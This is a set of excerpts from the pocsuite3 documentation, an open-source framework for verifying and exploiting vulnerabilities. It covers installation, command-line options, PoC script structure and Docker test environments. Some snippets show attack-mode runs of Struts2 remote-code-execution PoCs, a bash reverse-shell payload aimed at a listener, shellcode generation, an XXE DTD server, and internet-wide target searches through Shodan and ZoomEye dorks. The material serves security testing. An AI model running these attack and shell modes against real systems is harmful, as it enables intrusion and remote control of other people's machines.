### Install Pocsuite from Source Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Installs Pocsuite3 by downloading the source code package, extracting it, installing dependencies, and then setting up the package. This method is useful for the latest versions or when direct installation is not feasible. ```bash wget https://github.com/knownsec/pocsuite3/archive/master.zip unzip master.zip cd pocsuite3-master pip3 install -r requirements.txt python3 setup.py install ``` -------------------------------- ### Pocsuite3 API Integration Example Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Demonstrates how to programmatically integrate and execute Pocsuite3 functionalities using its API. This includes initialization, starting the scan, and retrieving results. ```python from pocsuite3.api import init_pocsuite from pocsuite3.api import start_pocsuite from pocsuite3.api import get_results def run_pocsuite(): # config 配置可参见命令行参数, 用于初始化 pocsuite3.lib.core.data.conf config = { 'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21'], 'poc': ['ecshop_rce', 'ftp_burst'] } init_pocsuite(config) start_pocsuite() result = get_results() ``` -------------------------------- ### pocsuite3 Console Output Example Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Provides an example of the console output when running pocsuite3, showing the framework's banner, loading status, Docker container execution, and scan completion messages. ```shell ,------. ,--. ,--. ,----. {2.0.6-cc19ae5} | .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. | | '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' < | | --'' '-' \ `--.-' `' '' | | | | \ --/'-' | `--' `---' `---`----' `----'`--' `--' `----`----' https://pocsuite.org [*] starting at 15:34:12 [15:34:12] [INFO] loading PoC script 'pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py' [15:34:12] [INFO] Image struts2_045_rce_cve-2017:pocsuite exists [15:34:12] [INFO] Run container fa5b3b7bb2ea successful! [15:34:12] [INFO] pocsusite got a total of 0 tasks [15:34:12] [INFO] Scan completed,ready to print ``` -------------------------------- ### POCSuite CLI Usage Examples Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Demonstrates various ways to use the POCSuite command-line interface for vulnerability scanning and exploitation. Includes examples for basic usage, shell mode, searching targets via ZoomEye, loading plugins, handling different target inputs (URLs, files, CIDR), and passing custom parameters to POC scripts. ```shell pocsuite -u http://example.com -r example.py -v 2 ``` ```shell pocsuite -u http://example.com -r example.py -v 2 --shell ``` ```shell pocsuite -r redis.py --dork service:redis --threads 20 ``` ```shell pocsuite -u http://example.com --plugins poc_from_pocs,html_report ``` ```shell pocsuite -f batch.txt --plugins poc_from_pocs,html_report ``` ```shell pocsuite -u 10.0.0.0/24 -r example.py ``` ```shell pocsuite -u http://example.com -r ecshop_rce.py --attack --command "whoami" ``` ```shell poc-console ``` -------------------------------- ### Install Pocsuite via Docker Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Runs Pocsuite3 within a Docker container. This command pulls the official Pocsuite3 Docker image and starts an interactive terminal session inside the container. ```bash docker run -it pocsuite3/pocsuite3 ``` -------------------------------- ### Install Pocsuite via Pip Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Installs the Pocsuite3 package using pip, the Python package installer. This is the standard method for installing Python packages and can be used on various operating systems. ```bash pip3 install pocsuite3 # use other pypi mirror pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3 ``` -------------------------------- ### Install Pocsuite via AUR (Arch Linux) Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Installs Pocsuite3 on Arch Linux using the Arch User Repository (AUR) helper 'yay'. This command fetches and builds the package from the AUR. ```bash yay pocsuite3 ``` -------------------------------- ### Install Pocsuite via APT (Debian/Ubuntu/Kali) Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Installs Pocsuite3 on Debian-based Linux distributions like Ubuntu and Kali using the Advanced Package Tool (APT). It first updates the package list and then installs the package. ```bash sudo apt update sudo apt install pocsuite3 ``` -------------------------------- ### Pocsuite3 Customizable PoC Example Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Demonstrates how to create a PoC script in Pocsuite3 that accepts custom parameters like username and password using the _options method. It includes methods for verification and attack, and explains how to parse output. The example shows how to define options for user input and retrieve them using get_option. ```python from collections import OrderedDict from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE from pocsuite3.api import OptString class DemoPOC(POCBase): vulID = '0' # ssvid version = '1.0' author = ['seebug'] vulDate = '2019-2-26' createDate = '2019-2-26' updateDate = '2019-2-25' references = [''] name = '自定义命令参数登录例子' appPowerLink = 'http://www.knownsec.com/' appName = 'test' appVersion = 'test' vulType = VUL_TYPE.XSS desc = '''这个例子说明了你可以使用console模式设置一些参数或者使用命令中的'--'来设置自定义的参数''' samples = [] category = POC_CATEGORY.EXPLOITS.WEBAPP def _options(self): o = OrderedDict() o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=True) o["password"] = OptString('', description='这个poc需要用户密码,请输出用户密码', require=False) return o def _verify(self): result = {} payload = "username={0}&password={1}".format(self.get_option("username"), self.get_option("password")) r = requests.post(self.url, data=payload) if r.status_code == 200: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Postdata'] = payload return self.parse_output(result) def _attack(self): return self._verify() def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output register_poc(DemoPOC) ``` -------------------------------- ### Run Pocsuite with Docker Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Demonstrates how to execute a Pocsuite PoC script against a target URL, utilizing Docker for environment setup. It includes command-line arguments for specifying the PoC script, target URL, and Docker configuration. ```python pocsuite -r pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py -u http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action --docker-start --docker-port 127.0.0.1:8080:8080 ,------. ,--. ,--. ,----. {2.0.6-cc19ae5} | .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. | | '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' < | | --'' '-' \ `--.-' `' '' | | | | \ --/'-' | `--' `---' `---`----' `----'`--' `--' `----`----' https://pocsuite.org [*] starting at 15:38:46 [15:38:46] [INFO] loading PoC script 'pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py' [15:38:46] [INFO] Image struts2_045_rce_cve-2017:pocsuite exists [15:38:47] [INFO] Run container 1a6eae1e8953 successful! [15:38:47] [INFO] pocsusite got a total of 1 tasks [15:38:47] [INFO] running poc:'Struts2 045 RCE CVE-2017' target 'http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action' [15:39:17] [+] URL : http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action [15:39:17] [+] Headers : {'Server': 'Apache-Coyote/1.1', 'nyvkx': '788544', 'Set-Cookie': 'JSESSIONID=0A9892431B32A541B51D4721FA0D2728; Path=/S2-032-showcase/; HttpOnly', 'Content-Type': 'text/html;charset=ISO-8859-1', 'Transfer-Encoding': 'chunked', 'Date': 'Mon, 25 Dec 2023 07:39:17 GMT'} [15:39:17] [INFO] Scan completed,ready to print +------------------------------------------------------------------+--------------------------+--------+-----------+---------+---------+ | target-url | poc-name | poc-id | component | version | status | +------------------------------------------------------------------+--------------------------+--------+-----------+---------+---------+ | http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action | Struts2 045 RCE CVE-2017 | | struts2 | | success | +------------------------------------------------------------------+--------------------------+--------+-----------+---------+ success : 1 / 1 ``` -------------------------------- ### Install Pocsuite via Homebrew (macOS) Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Installs Pocsuite3 on macOS using the Homebrew package manager. This command updates Homebrew, checks for Pocsuite3 information, and then installs it. ```bash brew update brew info pocsuite3 brew install pocsuite3 ``` -------------------------------- ### Pocsuite Docker Environment Options Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Details the command-line options available for configuring and managing Docker environments when running Pocsuite PoCs. These options allow for starting Docker, publishing ports, mounting volumes, setting environment variables, and controlling Docker execution. ```APIDOC Docker Environment Options: --docker-start Description: Run the docker for PoC. If specified, docker images will be obtained from poc. --docker-port DOCKER_PORT Description: Publish a container's port(s) to the host. Format: [host port]:[container port]. Multiple ports can be specified. --docker-volume DOCKER_VOLUME Description: Bind mount a volume. Format: /host/path/:/container/path. Multiple volumes can be specified. --docker-env DOCKER_ENV Description: Set environment variables. Format: VARIBLES=value. Multiple variables can be specified. --docker-only Description: Only run docker environment, without executing the PoC. Usage Note: The usage of these parameters is similar to Docker's command-line parameters. ``` -------------------------------- ### PoC Naming Convention Example Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Illustrates the required naming convention for PoC files in Pocsuite3. The format is application_name_version_vulnerability_type, converted to lowercase with symbols replaced by underscores. ```python _1847_seeyon_3_1_login_info_disclosure.py ``` -------------------------------- ### Pocsuite3 Demo POC Class Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Example of a custom Proof of Concept (PoC) class inheriting from POCBase, demonstrating the structure for vulnerability verification and result parsing within the Pocsuite3 framework. ```python class DemoPOC(POCBase): vulID = '' # ssvid version = '1.0' author = ['seebug'] vulDate = '2018-03-08' createDate = '2018-04-12' updateDate = '2018-04-13' references = [''] name = '' appPowerLink = '' appName = '' appVersion = '' vulType = '' desc = ''' ''' samples = [] install_requires = [''] def _verify(self): result = {} '''Simple http server demo default params: bind_ip='0.0.0.0' bind_port=666 is_ipv6=False use_https=False certfile=os.path.join(paths.POCSUITE_DATA_PATH, 'cacert.pem') requestHandler=BaseRequestHandler You can write your own handler, default list current directory ''' httpd = PHTTPServer(requestHandler=MyRequestHandler) httpd.start() # Write your code return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output _attack = _verify register_poc(DemoPOC) ``` -------------------------------- ### Pocsuite3 PHP File Upload Verification Example Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Shows how to verify PHP file uploads using `random_str()` and `hashlib`. It generates a payload with a random token, checks for the token's MD5 hash in the output, and includes cleanup logic for the uploaded file. ```python from pocsuite3.api import random_str import hashlib # ... inside PoC class method ... token = random_str() payload = '' % token # ... send payload ... # content = response.text if hashlib.new('md5', token).hexdigest() in content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url ``` -------------------------------- ### Pocsuite3 XSS Verification Example Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Illustrates using `random_str()` for Cross-Site Scripting (XSS) vulnerability checks. It shows creating a payload with a random token and searching for the exact payload string in the response content. ```python from pocsuite3.api import random_str # ... inside PoC class method ... token = random_str() payload = 'alert("%s")' % token # ... send payload ... # content = response.text if payload in content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url ``` -------------------------------- ### Pocsuite3 SQL Injection Verification Example Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Demonstrates using `random_str()` for SQL injection verification to avoid WAF detection. It involves generating a random token, embedding it in a payload, and checking the response for the token's MD5 hash. ```python from pocsuite3.api import random_str import hashlib # ... inside PoC class method ... token = random_str() payload = 'select md5(%s)' % token # ... send payload ... # content = response.text if hashlib.new('md5', token).hexdigest() in content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url ``` -------------------------------- ### Exploit Struts2 S2-053 RCE with pocsuite Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/Apache_Struts2/README.md Provides an example of using pocsuite to execute a command on a target vulnerable to Apache Struts2 S2-053 (CVE-2017-12611). The command includes the exploit script, target URL, attack mode, and the 'whoami' command. ```python pocsuite -r 20170807_WEB_Apache_Struts2_053_RCE_CVE-2017-12611.py -u http://127.0.0.1:8080/S2-053/index.action --attack --command whoami ``` -------------------------------- ### Exploit Struts2 S2-066 RCE with pocsuite Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/Apache_Struts2/README.md Provides an example of using pocsuite to exploit Apache Struts2 S2-066 (CVE-2023-50164). The command specifies the exploit script and the target URL, enabling attack mode. ```python pocsuite -r 20231204_WEB_Apache_Struts2_066_RCE_CVE-2023-50164.py -u http://127.0.0.1:8080/S2-066/upload ``` -------------------------------- ### PoCSuite3 Core Options Source: https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md Describes fundamental command-line options for PoCSuite3, including file input, POC file specification, and verification/attack modes. ```APIDOC --options Show all definition options. -f, --file URLFILE Scan multiple targets given in a textual file. Example: $ pocsuite -r pocs/poc_example.py -f url.txt --verify -r POCFILE POCFILE can be a file or Seebug SSVID. pocsuite plugin can load poc codes from any where. Example: $ pocsuite -r ssvid-97343 -u http://www.example.com --shell --verify Run poc with verify mode. PoC(s) will be only used for a vulnerability scanning. Example: $ pocsuite -r pocs/poc_example.py -u http://www.example.com/ --verify --attack Run poc with attack mode, PoC(s) will be exploitable, and it may allow hackers/researchers break into labs. Example: $ pocsuite -r pocs/poc_example.py -u http://www.example.com/ --attack --shell Run poc with shell mode, PoC will be exploitable, when PoC shellcode successfully executed, pocsuite3 will drop into interactive shell. Example: $ pocsuite -r pocs/poc_example.py -u http://www.example.com/ --shell ``` -------------------------------- ### Attack Mode (_attack) Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Describes the structure for the attack mode of a PoC script, used for actions like getting a shell or extracting sensitive information. The results are stored in a 'result' dictionary. ```python def _attack(self): output = Output(self) result = {} # 攻击代码 # ... # If no attack mode, return self._verify() # return self._verify() ``` -------------------------------- ### Run PoC Script with Docker Environment Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Illustrates how to execute a pocsuite3 Python script using the `--docker-start` flag. This command launches the specified PoC within a Docker container, mapping ports and setting environment variables as needed. ```shell pocsuite -r pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py --docker-start --docker-port 127.0.0.1:8080:8080 --docker-env A=test --docker-port 8899:7890 ``` -------------------------------- ### Pocsuite CLI Usage and Options Source: https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md This section details the command-line interface for pocsuite, a powerful tool for security verification and exploitation. It covers general options, target definition, operational modes, network request configurations, account integrations for various services, module search parameters, and optimization settings. ```APIDOC pocsuite [options] General Options: -h, --help show this help message and exit --version Show program's version number and exit --update Update Pocsuite3 -n, --new Create a PoC template -v {0,1,2,3,4,5,6} Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -u URL [URL ...], --url URL [URL ...] Target URL/CIDR (e.g. "http://www.site.com/vuln.php?id=1") -f URL_FILE, --file URL_FILE Scan multiple targets given in a textual file (one per line) -p PORTS, --ports PORTS add additional port to each target (e.g. 8080,8443) -r POC [POC ...] Load PoC file from local or remote from seebug website -k POC_KEYWORD Filter PoC by keyword, e.g. ecshop -c CONFIGFILE Load options from a configuration INI file Mode: Pocsuite running mode options --verify Run poc with verify mode --attack Run poc with attack mode --shell Run poc with shell mode Request: Network request options --cookie COOKIE HTTP Cookie header value --host HOST HTTP Host header value --referer REFERER HTTP Referer header value --user-agent AGENT HTTP User-Agent header value (default random) --proxy PROXY Use a proxy to connect to the target URL (protocol://host:port) --proxy-cred PROXY_CRED Proxy authentication credentials (name:password) --timeout TIMEOUT Seconds to wait before timeout connection (default 10) --retry RETRY Time out retrials times (default 0) --delay DELAY Delay between two request of one thread --headers HEADERS Extra headers (e.g. "key1: value1\nkey2: value2") Account: Account options --ceye-token CEYE_TOKEN CEye token --oob-server OOB_SERVER Interactsh server to use (default "interact.sh") --oob-token OOB_TOKEN Authentication token to connect protected interactsh server --seebug-token SEEBUG_TOKEN Seebug token --zoomeye-token ZOOMEYE_TOKEN ZoomEye token --shodan-token SHODAN_TOKEN Shodan token --fofa-user FOFA_USER Fofa user --fofa-token FOFA_TOKEN Fofa token --quake-token QUAKE_TOKEN Quake token --hunter-token HUNTER_TOKEN Hunter token --censys-uid CENSYS_UID Censys uid --censys-secret CENSYS_SECRET Censys secret Modules: Modules options --dork DORK Zoomeye dork used for search --dork-zoomeye DORK_ZOOMEYE Zoomeye dork used for search --dork-shodan DORK_SHODAN Shodan dork used for search --dork-fofa DORK_FOFA Fofa dork used for search --dork-quake DORK_QUAKE Quake dork used for search --dork-hunter DORK_HUNTER Hunter dork used for search --dork-censys DORK_CENSYS Censys dork used for search --max-page MAX_PAGE Max page used in search API --search-type SEARCH_TYPE search type used in search API, web or host --vul-keyword VUL_KEYWORD Seebug keyword used for search --ssv-id SSVID Seebug SSVID number for target PoC --lhost CONNECT_BACK_HOST Connect back host for target PoC in shell mode --lport CONNECT_BACK_PORT Connect back port for target PoC in shell mode --tls Enable TLS listener in shell mode --comparison Compare popular web search engines --dork-b64 Whether dork is in base64 format Optimization: Optimization options -o OUTPUT_PATH, --output OUTPUT_PATH Output file to write (JSON Lines format) --plugins PLUGINS Load plugins to execute --pocs-path POCS_PATH User defined poc scripts path --threads THREADS Max number of concurrent network requests (default 150) --batch BATCH Automatically choose defaut choice without asking --requires Check install_requires --quiet Activate quiet mode, working without logger --ppt Hiden sensitive information when published to the network --pcap use scapy capture flow --rule export suricata rules, default export reqeust and response --rule-req only export request rule --rule-filename RULE_FILENAME Specify the name of the export rule file Poc options: (No specific options listed for 'Poc options' in the provided text.) ``` -------------------------------- ### PoCSuite3 Rule Export and Advanced Usage Source: https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md Covers options for exporting Suricata rules and demonstrates advanced usage patterns for batch processing, custom parameters, and console mode. ```APIDOC --rule Export suricate rules, default export request and response. The poc directory is /pocs/. Use the --pocs-path parameter to set the directory where the poc needs to be ruled. Example: $ pocsuite --rule --rule-req In some cases, we may only need the request rule, --rule-req only export request rule. Example: $ pocsuite --rule-req Example Usage: cli mode: # basic usage, use -v to set the log level pocsuite -u http://example.com -r example.py -v 2 # run poc with shell mode pocsuite -u http://example.com -r example.py -v 2 --shell # search for the target of redis service from ZoomEye and perform batch detection of vulnerabilities. The threads is set to 20 pocsuite -r redis.py --dork service:redis --threads 20 # load all poc in the poc directory and save the result as html pocsuite -u http://example.com --plugins poc_from_pocs,html_report # load the target from the file, and use the poc under the poc directory to scan pocsuite -f batch.txt --plugins poc_from_pocs,html_report # load CIDR target pocsuite -u 10.0.0.0/24 -r example.py --plugins target_from_cidr # the custom parameters `command` is implemented in ecshop poc, which can be set from command line options pocsuite -u http://example.com -r ecshop_rce.py --attack --command "whoami" console mode: poc-console ``` -------------------------------- ### Output Handling and Parsing Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Demonstrates how to use the Output API for reporting results and handling exceptions. It shows calling output.success() or output.fail() and suggests using parse_output for common result processing. ```python def _verify(self, verify=True): result = {} ... return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output ``` -------------------------------- ### PoCSuite3 Threading and Search Engine Integration Source: https://github.com/knownsec/pocsuite3/blob/master/docs/USAGE.md Details options for controlling concurrency with threads and integrating with various search engines (ZoomEye, Shodan, Fofa, Quake) for target discovery. ```APIDOC --threads THREADS Using multiple threads, the default number of threads is 150. Example: $ pocsuite -r pocs/poc_example.py -f url.txt --verify --threads 10 --dork DORK If you are a ZoomEye user, use the API for cool and hackable interface. ex: Search redis server with port:6379 and redis keyword. Example: $ pocsuite --dork 'port:6379' --vul-keyword 'redis' --max-page 2 --dork-shodan DORK If you are a Shodan user, use the API for cool and hackable interface. ex: Search libssh server with libssh keyword. Example: pocsuite -r pocs/libssh_auth_bypass.py --dork-shodan libssh --threads 10 --dork-fofa DORK If you are a Fofa user, use the API for cool and hackable interface. ex: Search web server thinkphp with body="thinkphp" keyword. Example: $ pocsuite -r pocs/check_http_status.py --dork-fofa 'body="thinkphp"' --search-type web --threads 10 --dork-quake DORK If you are a Quake user, use the API for cool and hackable interface. ex: Search web server thinkphp with app:"ThinkPHP" keyword. Example: $ pocsuite -r pocs/check_http_status.py --dork-quake 'app:"ThinkPHP"' --threads 10 --dork-b64 In order to solve the problem of escaping, use --dork-b64 to tell the program that you are passing in base64 encoded dork. Example: $ pocsuite --dork cG9ydDo2Mzc5 --vul-keyword 'redis' --max-page 2 --dork-b64 ``` -------------------------------- ### Define Dockerfile for PoC Script Source: https://github.com/knownsec/pocsuite3/blob/master/README.md Demonstrates how to define a Dockerfile within a Python PoC script using the `dockerfile` attribute. This allows pocsuite3 to build and run the PoC within a specified containerized environment. ```python class DemoPOC(POCBase): vulID = '' # ssvid version = '1.0' author = [''] vulDate = '2029-5-8' createDate = '2019-5-8' updateDate = '2019-5-8' references = [''] name = 'Struts2 045 RCE CVE-2017' appPowerLink = '' appName = 'struts2' appVersion = '' vulType = '' desc = '''S2-045:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3)''' samples = [] category = POC_CATEGORY.EXPLOITS.WEBAPP dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest''' ``` -------------------------------- ### HTTP Server Demo with XXE DTD Handling (PoCsuite3) Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md This Python script demonstrates a basic HTTP server using Python's built-in http.server module, integrated with the PoCsuite3 framework. It includes a custom request handler that specifically serves a DTD file for XML External Entity (XXE) attacks when the '/xxe_dtd' path is requested. It also handles HEAD requests for files ending in '.jar'. ```Python """ If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit https://pocsuite.org """ from http.server import SimpleHTTPRequestHandler from pocsuite3.api import Output, POCBase, register_poc from pocsuite3.api import PHTTPServer class MyRequestHandler(SimpleHTTPRequestHandler): def do_GET(self): path = self.path status = 404 count = 0 xxe_dtd = '''xxx''' if path == "/xxe_dtd": count = len(xxe_dtd) status = 200 self.send_response(status) self.send_header('Content-Type', 'text/html') self.send_header('Content-Length', '{}'.format(count)) self.end_headers() self.wfile.write(xxe_dtd.encode()) return self.send_response(status) self.send_header('Content-Type', 'text/html') self.send_header("Content-Length", "{}".format(count)) self.end_headers() def do_HEAD(self): status = 404 if self.path.endswith('jar'): status = 200 self.send_response(status) self.send_header("Content-type", "text/html") self.send_header("Content-Length", "0") ``` -------------------------------- ### Basic PoC Structure Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Illustrates the fundamental structure of a Pocsuite3 PoC script, including necessary imports from the pocsuite3.api module and defining a custom POC class that inherits from POCBase. ```python from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str class DemoPOC(POCBase): ... ``` -------------------------------- ### Pocsuite3 Common API Methods Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Lists core API methods available in Pocsuite3 for logging, HTTP requests, external service integration (Seebug, ZoomEye, CEye), crawling, HTTP servers, reverse payloads, and result retrieval. ```APIDOC Pocsuite3 Common API: Logging: from pocsuite3.api import logger Usage: logger.log(level, message) or logger.info(message), logger.error(message), etc. HTTP Requests: from pocsuite3.api import requests Usage: Similar to the standard Python 'requests' library. External Service Integrations: from pocsuite3.api import Seebug Usage: For interacting with Seebug vulnerability database. from pocsuite3.api import ZoomEye Usage: For interacting with ZoomEye search engine. from pocsuite3.api import CEye Usage: For interacting with CEye vulnerability scanning platform. Web Crawling: from pocsuite3.api import crawl Usage: Provides simple web crawling functionality. HTTP Server: from pocsuite3.api import PHTTPServer Usage: To start a local HTTP server for verification purposes. Reverse Shell Payloads: from pocsuite3.api import REVERSE_PAYLOAD Usage: Access pre-defined reverse shell payloads. Result Retrieval: from pocsuite3.api import get_results Usage: To retrieve scan results. ShellCode Generation: from pocsuite3.api import generate_shellcode_list, get_listener_ip, get_listener_port, OS, OS_ARCH Usage: Generates shellcode for various OS and architectures, requires listener IP/port. ``` -------------------------------- ### PoC Third-Party Module Dependency Specification Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Shows how to declare third-party module dependencies for a PoC. The `install_requires` field should be a list of strings, specifying module names and optionally versions or import aliases. ```python install_requires =['pycryptodome:Crypto'] ``` -------------------------------- ### Result Return Structure Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Specifies the standardized format for returning results from PoC verification or attack modes. Keys like 'DBInfo', 'ShellInfo', 'FileInfo', 'XSSInfo', 'AdminInfo', 'Database', 'VerifyInfo', 'SiteAttr', and 'Stdout' are used to categorize findings. ```python 'Result':{ 'DBInfo' : {'Username': 'xxx', 'Password': 'xxx', 'Salt': 'xxx' , 'Uid':'xxx' , 'Groupid':'xxx'}, 'ShellInfo': {'URL': 'xxx', 'Content': 'xxx' }, 'FileInfo': {'Filename':'xxx','Content':'xxx'}, 'XSSInfo': {'URL':'xxx','Payload':'xxx'}, 'AdminInfo': {'Uid':'xxx' , 'Username':'xxx' , 'Password':'xxx' } 'Database': {'Hostname':'xxx', 'Username':'xxx', 'Password':'xxx', 'DBname':'xxx'}, 'VerifyInfo':{'URL': 'xxx' , 'Postdata':'xxx' , 'Path':'xxx'} 'SiteAttr': {'Process':'xxx'} 'Stdout': 'result output string' } ``` -------------------------------- ### Pocsuite3 ShellCode Generation Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Demonstrates generating shellcode for reverse shells on Linux and Windows x86/x64 environments. It uses `generate_shellcode_list` with listener details and target OS/architecture. ```python from pocsuite3.api import generate_shellcode_list, get_listener_ip, get_listener_port from pocsuite3.api import OS, OS_ARCH # Example for Linux x86 _list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(), os_target=OS.LINUX, os_target_arch=OS_ARCH.X86) # The generated _list contains commands to execute the shellcode. ``` -------------------------------- ### PoC Registration Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Shows the final step of registering the implemented PoC class with the Pocsuite3 framework using the register_poc() function, making it discoverable and executable. ```python class DemoPOC(POCBase): # POC内部代码 # 注册 DemoPOC 类 register_poc(DemoPOC) ``` -------------------------------- ### PoC Metadata Fields Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Defines the essential metadata fields required for a PoC script, providing details about the vulnerability, PoC version, author, dates, references, application information, and search dorks. ```python vulID = '99335' # Seebug 漏洞收录ID,如果没有则为0 version = '1' # PoC 的版本,默认为1 author = 'seebug' # PoC 的作者 vulDate = '2021-8-18' # 漏洞公开日期 (%Y-%m-%d) createDate = '2021-8-20' # PoC 编写日期 (%Y-%m-%d) updateDate = '2021-8-20' # PoC 更新日期 (%Y-%m-%d) references = ['https://www.seebug.org/vuldb/ssvid-99335'] # 漏洞来源地址,0day 不用写 name = 'Fortinet FortiWeb 授权命令执行 (CVE-2021-22123)' # PoC 名称,建议命令方式:<厂商> <组件> <版本> <漏洞类型> appPowerLink = 'https://www.fortinet.com' # 漏洞厂商主页地址 appName = 'FortiWeb' # 漏洞应用名称 appVersion = '<=6.4.0' # 漏洞影响版本 vulType = 'Code Execution' # 漏洞类型,参见漏洞类型规范表 desc = '/api/v2.0/user/remoteserver.saml接口的name参数存在命令注入' # 漏洞简要描述 samples = ['http://192.168.1.1'] # 测试样列,就是用 PoC 测试成功的目标 install_requires = ['BeautifulSoup4:bs4'] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写 pocDesc = ''' poc的用法描述 ''' dork = {'zoomeye': 'deviceState.admin.hostname'} # 搜索 dork,如果运行 PoC 时不提供目标且该字段不为空,将会调用插件从搜索引擎获取目标。 suricata_request = '''http.uri; content: "/api/v2.0/user/remoteserver.saml";''' # 请求流量 suricata 规则 suricata_response = '' # 响应流量 suricata 规则 ``` -------------------------------- ### Run Struts2 Vulnerability Environment (Docker) Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/Apache_Struts2/README.md Command to pull and run the Docker image for testing Struts2 vulnerabilities. This command maps port 8080 from the container to the host. ```bash docker run -it -p 8080:8080 isxiangyang/struts2-all-vul-pocsuite:latest ``` -------------------------------- ### Shell Mode (_shell) Source: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md Details the implementation for the shell mode, which facilitates reverse or bind shells. It explains how to use REVERSE_PAYLOAD and mentions support for bind shells via helper functions like bind_shell and bind_tcp_shell. ```python def _shell(self): cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port()) # 攻击代码 execute cmd # For bind shells: # return bind_shell(self, rce_func) # return bind_tcp_shell(bind_shell_ip, bind_shell_port) # return bind_telnet_shell(ip, port, username, password) ```